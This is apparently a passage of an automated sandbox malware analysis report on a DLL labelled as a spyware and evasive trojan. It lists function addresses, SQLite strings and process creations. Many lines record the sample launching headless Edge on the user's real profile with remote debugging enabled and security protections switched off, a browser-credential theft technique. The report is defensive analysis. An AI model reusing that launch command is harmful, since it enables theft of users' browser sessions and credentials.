        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF2124B014_2_00007FFDFF2124B0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF22E4A014_2_00007FFDFF22E4A0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF28051014_2_00007FFDFF280510
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF28154014_2_00007FFDFF281540
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF17A53014_2_00007FFDFF17A530
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF15153014_2_00007FFDFF151530
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1AD38014_2_00007FFDFF1AD380
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1CC38014_2_00007FFDFF1CC380
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1C039014_2_00007FFDFF1C0390
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1603D014_2_00007FFDFF1603D0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1C43D014_2_00007FFDFF1C43D0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF23E3B014_2_00007FFDFF23E3B0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF2AF3A814_2_00007FFDFF2AF3A8
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF24C3A014_2_00007FFDFF24C3A0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF17C3E014_2_00007FFDFF17C3E0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF19E3E014_2_00007FFDFF19E3E0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF2183E014_2_00007FFDFF2183E0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF19F44014_2_00007FFDFF19F440
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF18545014_2_00007FFDFF185450
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF25D44014_2_00007FFDFF25D440
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF26B43014_2_00007FFDFF26B430
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF29643014_2_00007FFDFF296430
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF17326014_2_00007FFDFF173260
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF2302E014_2_00007FFDFF2302E0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1D634014_2_00007FFDFF1D6340
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF17532314_2_00007FFDFF175323
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF23132014_2_00007FFDFF231320
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF22D19014_2_00007FFDFF22D190
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF22017B14_2_00007FFDFF22017B
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1B01C014_2_00007FFDFF1B01C0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1681A014_2_00007FFDFF1681A0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF29121014_2_00007FFDFF291210
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF18021014_2_00007FFDFF180210
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF20621014_2_00007FFDFF206210
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1BE1E014_2_00007FFDFF1BE1E0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1911F014_2_00007FFDFF1911F0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1DC22014_2_00007FFDFF1DC220
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF25D0D014_2_00007FFDFF25D0D0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1C00D014_2_00007FFDFF1C00D0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1570B014_2_00007FFDFF1570B0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1AC10014_2_00007FFDFF1AC100
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF2360E014_2_00007FFDFF2360E0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1E414014_2_00007FFDFF1E4140
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF19912014_2_00007FFDFF199120
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF19413014_2_00007FFDFF194130
        Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFDFF218EA0 appears 206 times
        Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFDFF241F90 appears 31 times
        Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFDFF178730 appears 306 times
        Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFDFF164970 appears 110 times
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5408 -s 412
        Source: classification engineClassification label: mal84.troj.spyw.evad.winDLL@60/21@5/5
        Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\Public\Documents\638724362535454058Jump to behavior
        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5472
        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5408
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
        Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\tmp10zwhv.tmpJump to behavior
        Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mP8rzGD7fG.dll,AddNumbers
        Source: rundll32.exe, 00000003.00000002.3112030805.00007FFE11744000.00000002.00000001.01000000.0000000C.sdmp, rundll32.exe, 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
        Source: rundll32.exe, rundll32.exe, 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
        Source: rundll32.exe, rundll32.exe, 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
        Source: rundll32.exe, rundll32.exe, 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
        Source: rundll32.exe, rundll32.exe, 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
        Source: rundll32.exe, rundll32.exe, 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
        Source: rundll32.exe, rundll32.exe, 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
        Source: mP8rzGD7fG.dllVirustotal: Detection: 33%
        Source: mP8rzGD7fG.dllReversingLabs: Detection: 47%
        Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll"
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mP8rzGD7fG.dll,AddNumbers
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9856 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9928 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1616 --field-trial-handle=1468,i,6882349471306671242,18432269874765290371,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1480 --field-trial-handle=1524,i,7590272609190287249,10177671036043717879,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mP8rzGD7fG.dll,DotNetRuntimeDebugHeader
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5408 -s 412
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",AddNumbers
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",DotNetRuntimeDebugHeader
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5472 -s 416
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9834 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1520 --field-trial-handle=1468,i,9150515577941078100,10285627021896123688,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9526 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1596 --field-trial-handle=1468,i,8283710897970219115,15923041528330294747,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9949 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1532 --field-trial-handle=1520,i,669827839164534897,9964202643193972366,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9470 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1608 --field-trial-handle=1484,i,2587286534842799086,6337891116832541392,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9459 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1624 --field-trial-handle=1556,i,748892074680113926,7417843126809738630,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9909 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1Jump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mP8rzGD7fG.dll,AddNumbersJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mP8rzGD7fG.dll,DotNetRuntimeDebugHeaderJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",AddNumbersJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",DotNetRuntimeDebugHeaderJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1Jump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9928 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9470 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9459 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9856 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9909 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1480 --field-trial-handle=1524,i,7590272609190287249,10177671036043717879,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3Jump to behavior
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1616 --field-trial-handle=1468,i,6882349471306671242,18432269874765290371,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3Jump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9834 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
